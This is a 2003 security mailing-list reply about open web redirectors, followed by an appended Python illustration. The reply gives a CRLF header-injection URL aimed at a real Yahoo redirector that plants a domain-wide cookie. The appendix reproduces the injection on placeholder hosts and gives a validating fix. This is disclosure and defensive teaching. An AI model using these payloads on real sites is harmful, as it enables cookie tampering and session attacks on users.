Re: [Full-Disclosure] CERT: Vulnerability in web redirectors
From: David Leadbeater (dgl@dgl.cx)
Date: 03/22/03
- Previous message: yossarian: "Re: [Full-Disclosure] Microsoft runs early April Fools ad"
- In reply to: Georgi Guninski: "Re: [Full-Disclosure] CERT: Vulnerability in web redirectors"
- Next in thread: http-equiv@excite.com: "Fw: [Full-Disclosure] CERT: Vulnerability in web redirectors"
From: David Leadbeater <dgl@dgl.cx>
To: Georgi Guninski <guninski@guninski.com>
Date: Sat, 22 Mar 2003 21:19:16 +0000
Georgi Guninski wrote:
> Like this one?:
> --------------------
> http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
> --------------------
> (may be wrapped)
That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/
It adds a cookie for the whole .yahoo.com domain; this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
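The header injection described in the message above, shown from the redirector's side as an added example that is not part of the original post or of any real redirector's code: a decoded target pasted into `Location:` yields an extra `Set-Cookie` header, while a validating builder refuses it. The hostnames (`example.org`, `example.com`) and all function names are constructed for illustration.

```python
from urllib.parse import quote, unquote, urlsplit

# Constructed inputs in the shape of the "/*<target>" suffix from the post.
BENIGN = "http://www.example.org/docs"
INJECTED = ("http://www.example.org%0D%0ASet-Cookie:%20foo%3D123"
            "%3B%20domain%3D.example.com%3B%20path%3D/")

class RejectedTarget(ValueError):
    """Raised when a redirect target must not be placed in a header."""

def naive_response(raw_target):
    # Vulnerable pattern: the decoded target goes straight into the header block.
    return "HTTP/1.1 302 Found\r\nLocation: " + unquote(raw_target) + "\r\n\r\n"

def header_names(response):
    # Header names a client would parse from the raw response text.
    head = response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0].lower() for line in head.split("\r\n")[1:]]

def has_control_chars(text):
    return any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in text)

def safe_location(raw_target, max_depth=3):
    # Decode once, as the redirector would, then keep decoding to catch
    # nested escapes such as %250D that a later hop might unwrap.
    decoded = unquote(raw_target)
    probe = decoded
    for _ in range(max_depth):
        if has_control_chars(probe):
            raise RejectedTarget("control character in redirect target")
        nxt = unquote(probe)
        if nxt == probe:
            break
        probe = nxt
    else:
        raise RejectedTarget("target is encoded too deeply")
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise RejectedTarget("only absolute http(s) targets are allowed")
    # Re-encode anything outside the URL character set; keep existing escapes.
    return quote(decoded, safe=":/?#[]@!$&'()*+,;=%-._~")

def safe_response(raw_target):
    return "HTTP/1.1 302 Found\r\nLocation: " + safe_location(raw_target) + "\r\n\r\n"
```

Rejecting on any CR, LF or other control character after decoding is the essential check; the scheme and host test only narrows what the redirector will forward to.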